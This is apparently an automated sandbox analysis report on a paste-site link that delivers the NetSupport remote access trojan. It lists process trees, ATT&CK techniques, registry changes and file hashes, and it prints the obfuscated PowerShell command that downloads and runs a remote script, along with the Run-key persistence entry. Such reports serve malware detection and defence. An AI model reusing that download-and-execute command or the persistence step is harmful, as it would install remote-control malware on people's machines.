netsupport | hxxps://pasteco[.]com/t3yc80yb

Analysis

max time kernel
121s
max time network
133s
platform
windows10-ltsc 2021_x64
resource
win10ltsc2021-20241023-en
resource tags

arch:x64arch:x86image:win10ltsc2021-20241023-enlocale:en-usos:windows10-ltsc 2021-x64system
submitted
09-11-2024 17:46

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://pasteco.com/t3yc80yb

Score

10^/10

netsupport discovery execution persistence rat

Malware Config

Signatures

NetSupport
NetSupport is a remote access tool sold as a legitimate system administration software.
rat netsupport
Netsupport family
netsupport

Blocklisted process makes network request 1 IoCs

flow	pid	Process
81	5476	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Powershell Invoke Web Request.

execution

PowerShell

T1059.001

pid	Process
5476	powershell.exe

Downloads MZ/PE file

Executes dropped EXE 2 IoCs

pid	Process
5964	zz.exe
5620	client32.exe

Loads dropped DLL 6 IoCs

pid	Process
5964	zz.exe
5620	client32.exe
5620	client32.exe
5620	client32.exe
5620	client32.exe
5620	client32.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-584106483-899802418-1877852863-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\NSSupport = "C:\\Users\\Admin\\AppData\\Roaming\\Ns\\client32.exe"	powershell.exe

Drops file in Program Files directory 2 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\c4b43f83-b803-435e-a57b-2c6ebf85c8b9.tmp	setup.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\20241109174715.pma	setup.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	zz.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	client32.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Suspicious behavior: EnumeratesProcesses 13 IoCs

pid	Process
3900	msedge.exe
3900	msedge.exe
2028	msedge.exe
2028	msedge.exe
2648	identity_helper.exe
2648	identity_helper.exe
5476	powershell.exe
5476	powershell.exe
5476	powershell.exe
548	msedge.exe
548	msedge.exe
548	msedge.exe
548	msedge.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs

pid	Process
2028	msedge.exe
2028	msedge.exe
2028	msedge.exe
2028	msedge.exe
2028	msedge.exe
2028	msedge.exe

Suspicious use of AdjustPrivilegeToken 6 IoCs

description	pid	Process
Token: SeDebugPrivilege	5476	powershell.exe
Token: SeRestorePrivilege	5964	zz.exe
Token: 35	5964	zz.exe
Token: SeSecurityPrivilege	5964	zz.exe
Token: SeSecurityPrivilege	5964	zz.exe
Token: SeSecurityPrivilege	5620	client32.exe

Suspicious use of FindShellTrayWindow 27 IoCs

pid	Process
2028	msedge.exe
2028	msedge.exe
2028	msedge.exe
2028	msedge.exe
2028	msedge.exe
2028	msedge.exe
2028	msedge.exe
2028	msedge.exe
2028	msedge.exe
2028	msedge.exe
2028	msedge.exe
2028	msedge.exe
2028	msedge.exe
2028	msedge.exe
2028	msedge.exe
2028	msedge.exe
2028	msedge.exe
2028	msedge.exe
2028	msedge.exe
2028	msedge.exe
2028	msedge.exe
2028	msedge.exe
2028	msedge.exe
2028	msedge.exe
2028	msedge.exe
2028	msedge.exe
5620	client32.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
2028	msedge.exe
2028	msedge.exe
2028	msedge.exe
2028	msedge.exe
2028	msedge.exe
2028	msedge.exe
2028	msedge.exe
2028	msedge.exe
2028	msedge.exe
2028	msedge.exe
2028	msedge.exe
2028	msedge.exe
2028	msedge.exe
2028	msedge.exe
2028	msedge.exe
2028	msedge.exe
2028	msedge.exe
2028	msedge.exe
2028	msedge.exe
2028	msedge.exe
2028	msedge.exe
2028	msedge.exe
2028	msedge.exe
2028	msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2028 wrote to memory of 1156	2028	msedge.exe	82
PID 2028 wrote to memory of 1156	2028	msedge.exe	82
PID 2028 wrote to memory of 2688	2028	msedge.exe	83
PID 2028 wrote to memory of 2688	2028	msedge.exe	83
PID 2028 wrote to memory of 2688	2028	msedge.exe	83
PID 2028 wrote to memory of 2688	2028	msedge.exe	83
PID 2028 wrote to memory of 2688	2028	msedge.exe	83
PID 2028 wrote to memory of 2688	2028	msedge.exe	83
PID 2028 wrote to memory of 2688	2028	msedge.exe	83
PID 2028 wrote to memory of 2688	2028	msedge.exe	83
PID 2028 wrote to memory of 2688	2028	msedge.exe	83
PID 2028 wrote to memory of 2688	2028	msedge.exe	83
PID 2028 wrote to memory of 2688	2028	msedge.exe	83
PID 2028 wrote to memory of 2688	2028	msedge.exe	83
PID 2028 wrote to memory of 2688	2028	msedge.exe	83
PID 2028 wrote to memory of 2688	2028	msedge.exe	83
PID 2028 wrote to memory of 2688	2028	msedge.exe	83
PID 2028 wrote to memory of 2688	2028	msedge.exe	83
PID 2028 wrote to memory of 2688	2028	msedge.exe	83
PID 2028 wrote to memory of 2688	2028	msedge.exe	83
PID 2028 wrote to memory of 2688	2028	msedge.exe	83
PID 2028 wrote to memory of 2688	2028	msedge.exe	83
PID 2028 wrote to memory of 2688	2028	msedge.exe	83
PID 2028 wrote to memory of 2688	2028	msedge.exe	83
PID 2028 wrote to memory of 2688	2028	msedge.exe	83
PID 2028 wrote to memory of 2688	2028	msedge.exe	83
PID 2028 wrote to memory of 2688	2028	msedge.exe	83
PID 2028 wrote to memory of 2688	2028	msedge.exe	83
PID 2028 wrote to memory of 2688	2028	msedge.exe	83
PID 2028 wrote to memory of 2688	2028	msedge.exe	83
PID 2028 wrote to memory of 2688	2028	msedge.exe	83
PID 2028 wrote to memory of 2688	2028	msedge.exe	83
PID 2028 wrote to memory of 2688	2028	msedge.exe	83
PID 2028 wrote to memory of 2688	2028	msedge.exe	83
PID 2028 wrote to memory of 2688	2028	msedge.exe	83
PID 2028 wrote to memory of 2688	2028	msedge.exe	83
PID 2028 wrote to memory of 2688	2028	msedge.exe	83
PID 2028 wrote to memory of 2688	2028	msedge.exe	83
PID 2028 wrote to memory of 2688	2028	msedge.exe	83
PID 2028 wrote to memory of 2688	2028	msedge.exe	83
PID 2028 wrote to memory of 2688	2028	msedge.exe	83
PID 2028 wrote to memory of 2688	2028	msedge.exe	83
PID 2028 wrote to memory of 3900	2028	msedge.exe	84
PID 2028 wrote to memory of 3900	2028	msedge.exe	84
PID 2028 wrote to memory of 4408	2028	msedge.exe	85
PID 2028 wrote to memory of 4408	2028	msedge.exe	85
PID 2028 wrote to memory of 4408	2028	msedge.exe	85
PID 2028 wrote to memory of 4408	2028	msedge.exe	85
PID 2028 wrote to memory of 4408	2028	msedge.exe	85
PID 2028 wrote to memory of 4408	2028	msedge.exe	85
PID 2028 wrote to memory of 4408	2028	msedge.exe	85
PID 2028 wrote to memory of 4408	2028	msedge.exe	85
PID 2028 wrote to memory of 4408	2028	msedge.exe	85
PID 2028 wrote to memory of 4408	2028	msedge.exe	85
PID 2028 wrote to memory of 4408	2028	msedge.exe	85
PID 2028 wrote to memory of 4408	2028	msedge.exe	85
PID 2028 wrote to memory of 4408	2028	msedge.exe	85
PID 2028 wrote to memory of 4408	2028	msedge.exe	85
PID 2028 wrote to memory of 4408	2028	msedge.exe	85
PID 2028 wrote to memory of 4408	2028	msedge.exe	85
PID 2028 wrote to memory of 4408	2028	msedge.exe	85
PID 2028 wrote to memory of 4408	2028	msedge.exe	85
PID 2028 wrote to memory of 4408	2028	msedge.exe	85
PID 2028 wrote to memory of 4408	2028	msedge.exe	85

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument https://pasteco.com/t3yc80yb
1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2028
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x124,0x128,0x12c,0x100,0x130,0x7ffbf05a46f8,0x7ffbf05a4708,0x7ffbf05a4718
  2⤵
  PID:1156
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2040,4872500446031419762,18265036223559119945,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2076 /prefetch:2
  2⤵
  PID:2688
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2040,4872500446031419762,18265036223559119945,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2512 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3900
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2040,4872500446031419762,18265036223559119945,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2684 /prefetch:8
  2⤵
  PID:4408
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,4872500446031419762,18265036223559119945,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3408 /prefetch:1
  2⤵
  PID:4036
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,4872500446031419762,18265036223559119945,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3468 /prefetch:1
  2⤵
  PID:3152
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2040,4872500446031419762,18265036223559119945,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5964 /prefetch:8
  2⤵
  PID:1756
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings
  2⤵
  - Drops file in Program Files directory
  PID:1596
- - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x248,0x24c,0x250,0x224,0x254,0x7ff68e755460,0x7ff68e755470,0x7ff68e755480
    3⤵
    PID:5084
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2040,4872500446031419762,18265036223559119945,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5964 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2648
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,4872500446031419762,18265036223559119945,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5564 /prefetch:1
  2⤵
  PID:2380
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,4872500446031419762,18265036223559119945,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5556 /prefetch:1
  2⤵
  PID:2620
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,4872500446031419762,18265036223559119945,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5196 /prefetch:1
  2⤵
  PID:4564
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,4872500446031419762,18265036223559119945,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3488 /prefetch:1
  2⤵
  PID:4612
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2040,4872500446031419762,18265036223559119945,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.4355 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5180 /prefetch:2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:548

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1792

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2212

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe"
1⤵
PID:5268
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "$AI='TPS'; $mode='developer.c'; $version='2.9.6_Beta_AI'; $dev_more_enable='true'; $update='//mode'; $developer='ht'+$AI+':'+$update+$mode+'OM'; $charts='TradingView'; $Response=Invoke-WebRequest -Uri $developer -UseBasicParsing -UserAgent $charts; $Script=[System.Text.Encoding]::UTF8.GetString($Response.Content); IEX $Script"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Adds Run key to start application
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:5476
- - C:\Users\Admin\AppData\Roaming\zz.exe
    "C:\Users\Admin\AppData\Roaming\zz.exe" x b.vue -pkek -aoa -y
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    PID:5964
- - C:\Users\Admin\AppData\Roaming\Ns\client32.exe
    "C:\Users\Admin\AppData\Roaming\Ns\client32.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of FindShellTrayWindow
    PID:5620

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
ccff51f965f8f4176e4ad112c34c86a7

SHA1
eab249ca0f58ed7a8afbca30bdae123136463cd8

SHA256
3eb00cf1bd645d308d0385a95a30737679be58dcc5433bc66216aac762d9da33

SHA512
8c68f146152045c2a78c9e52198b8180b261edf61a8c28364728eafb1cba1df0fa29906e5ede69b3c1e0b67cfcbeb7fde65b8d2edbc397c9a4b99ecfe8dea2dd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
c29339188732b78d10f11d3fb23063cb

SHA1
2db38f26fbc92417888251d9e31be37c9380136f

SHA256
0a61fa9e17b9ae7812cdeda5e890b22b14e53fa14a90db334f721252a9c874c2

SHA512
77f1f5f78e73f4fc01151e7e2a553dc4ed9bf35dd3a9565501f698be373640f153c6d7fc83450b9d2f29aeaa72387dd627d56f287a46635c2da07c60bc3d6e2c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
552B

MD5
fe413e2494a4a1ed746f516b352caf29

SHA1
fe3e4f254d0218538d4a7b46bed0ae88a462c84c

SHA256
12ac857a1934766d0c4e008fb3128a9c2bc4e6320b6e5955b3061e2880417f9a

SHA512
2aae85e21e951a734ab6d4805e058983a2d4cf036c4cbce5a54131673568ba06b6f3bf36dc2deac18230e3b094570c0fba0237e7c345f1ea1039b6e9c7e6b2b9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
48B

MD5
96a51234917ce27c85c9f948868e36a8

SHA1
d81ea7132057bc20659e9aa1e9533ce1abff4c03

SHA256
d22e5fdb78e850edc158799e476722636cc895f83c505579c7e1ab97623418cf

SHA512
36cfbc81de1c1e8aefc2bf0580d803bb644979a82d646ba939f0f2dd236e1be42e002d13ee4f983a56ec8ba755600017e1f3d236d4a2472adf9782cb5892dc6b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Edge Profile.ico

Filesize
70KB

MD5
e5e3377341056643b0494b6842c0b544

SHA1
d53fd8e256ec9d5cef8ef5387872e544a2df9108

SHA256
e23040951e464b53b84b11c3466bbd4707a009018819f9ad2a79d1b0b309bc25

SHA512
83f09e48d009a5cf83fa9aa8f28187f7f4202c84e2d0d6e5806c468f4a24b2478b73077381d2a21c89aa64884df3c56e8dc94eb4ad2d6a8085ac2feb1e26c2ef

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
1KB

MD5
6bcca3ad08c47bf04d26666a0668ed10

SHA1
b3407add96c9c8c63388d46b203373fe3d391183

SHA256
86c820675b7384bec8d246e74842cbf9cb45aa3995735a52eb222feb5edda6d6

SHA512
4849f0b03d444c01f7ecd13b4e7fa780ce50bd6127f559be93a8bb9596f3f4437b67582d3f445d1107133ee5f2938079f6e1b7eed0733e72d47b5340aa0d26f1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State~RFe58cf32.TMP

Filesize
59B

MD5
2800881c775077e1c4b6e06bf4676de4

SHA1
2873631068c8b3b9495638c865915be822442c8b

SHA256
226eec4486509917aa336afebd6ff65777b75b65f1fb06891d2a857a9421a974

SHA512
e342407ab65cc68f1b3fd706cd0a37680a0864ffd30a6539730180ede2cdcd732cc97ae0b9ef7db12da5c0f83e429df0840dbf7596aca859a0301665e517377b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
c341bd99976554647b85facbf5ba0895

SHA1
4cd0eaf69c28f7f090ebe6457c72c459104fb205

SHA256
174c04bb1b0d94bc61b2dd8b65e5f64de25b880776a7ae1c68fa8a04a71e5742

SHA512
2397a9fbc38235e01e0d707716213f4e37288cab3e0e2c8facc9e30a52a84e8f9c1a7a48df79ebb9574cb00769a8f10ac5594c0b07fb5ebea9be106f21ed2829

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
dca5d82bceef33ab524a089fb6a5900b

SHA1
82364f01ee71afe6dfdd120b92948a2a8881e98f

SHA256
f0b4ad1d5d0759c853f3ac922e90f1ca53d182a78cbccb5bbe8332e4ddd77795

SHA512
222c8d2378b586fa06246360227443954f8dd043347e8876ce3fe628ed9ea3ed1a0f110a002f5b16201b3b7d14bddd29e9425a168a04bc4d4068a16fc397cf4b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
5a5b33eb189e270de7479825b615f12a

SHA1
aca9b6efc01fd3b48e3268045ff3966897afa80b

SHA256
69ac899a8371135a47e6b939d379a70d823d193ed8cbc9297f561e46be9e4645

SHA512
794a9e3a929cfbbf4d42c84cc5e1986a8847ad94ffe7769d6e928aa14d31aca21251777efdb73a8110e04ab0a70cf976a8150170a63e2dbea3bd498e0890881c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

Filesize
24KB

MD5
26978f38b0bce48572b90b762b7d937c

SHA1
8b8b88012fab1d37fca79575a5db81674b424867

SHA256
b38f05e2e63a1f87026aed06f5b85354570c6f91d28947466f0555276bab6afa

SHA512
501e0de5f46bfaac901cde5c39a321edc411426fd91c83427f36710fa56d20b5f6ab8f2219d963f7ab495c2df7def879652381db3876b7e2a7080921cce78379

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

Filesize
24KB

MD5
86aa28ffd286b08415aa197216684874

SHA1
d99924976c73e3220108817ad6bc1d8b1795ca2d

SHA256
a6dc4bc6ade3039e57b538f2620b91602199f1908b23c4a2beb3fd3aa721579d

SHA512
a51fbd1af778d32f2f95a9a863a59f42a7eb804dbb8ce85459297959eea21fbfe9625d74c3f91ad65016031d4b3e26eeb748c1c59e09ac68778fc670d408d0fa

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\CURRENT

Filesize
16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
44e0fa1b517dbf802b18faf0785eeea6ac51594b

SHA256
0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

SHA512
8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
206702161f94c5cd39fadd03f4014d98

SHA1
bd8bfc144fb5326d21bd1531523d9fb50e1b600a

SHA256
1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167

SHA512
0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\MANIFEST-000001

Filesize
41B

MD5
5af87dfd673ba2115e2fcf5cfdb727ab

SHA1
d5b5bbf396dc291274584ef71f444f420b6056f1

SHA256
f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4

SHA512
de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
690a512a640a85afd52645deb99b6f27

SHA1
95834db68879c0c990d3c3d53582dceaafe6bb65

SHA256
814690ef8d356f5ffa15ae28841dc207ed53b5b088bface7db35c413ffa07a32

SHA512
5df7b8db0dc1c770af63f15c4705dc9da10fa72d242b93f7fe534b79dba8e8a62b029e91fc2fa5f618987f32fef68234493d61e363de39f62553365ab539cba1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
8KB

MD5
4af1043b7a7720b93015ce96ad6492c7

SHA1
b33dd16e6bb9905aa6b8ba02d9f8768e03d9c0ae

SHA256
7214a69401753601986e6fe2a10052f7357412bf3f51620bbcc4a75937b50b20

SHA512
49073cbd00c3ac827e90b3160123872d63eea38986067fcd71a9afc6f92d0dc5156b2e23d5bc8d518704462d491e8868daeb576a804a12af3044d942735d4c22

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_aceou23n.v5g.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\7z.dll

Filesize
1.1MB

MD5
95c6515d88e9ea48a9b949a81c1dac4e

SHA1
c93eeb4241f69fea44c4d8ccdde03f3b40a6be3f

SHA256
b17c3e4058aacdcc36b18858d128d6b3058e0ea607a4dc59eb95b18b7c6acc7c

SHA512
d4474418a9290d89bff9ca58249e501e0d8f42a9153874c0dbb36f35eaabbb18a3e700fb6f2feb2eec7ceed3254ff1aec08752d09efad9d2c25aa6284471d1c6

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ccba5a5986c77e43.customDestinations-ms

Filesize
3KB

MD5
f02c8fdb72c128a82d16a35dbbe380c6

SHA1
963824fc706322b0c4ca9768458e26e61cc5657c

SHA256
603f506bf64d08800b2c10c50d27df01a566354c5b97a1ff2efbb90eff331565

SHA512
1afe0fab736994b01c91ceeba6a69fd0c0a996aba3fe6b20db43ea16c8710afffde25617cf7d34885f251b9f2ae4886a6f6d69d3e535394c58f12c8d95b71dc9

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ccba5a5986c77e43.customDestinations-ms

Filesize
3KB

MD5
4a91fd166628a580d9728f2700f5d4f1

SHA1
33704116541440ab86bf9b18363a3a1f7bbeef89

SHA256
91e9676f0865b1a5d6de5a721dd83c38241a3bdb62a122128e74a892e17a395d

SHA512
4358cc27f0dfe9e5d4c194dacf9e735db640baf2c323a5536eea5cc272dfde0ffcd36d42dbde994035af9abc346b3963eed6e8e34512462d14e181955ec4bc38

Download Submit
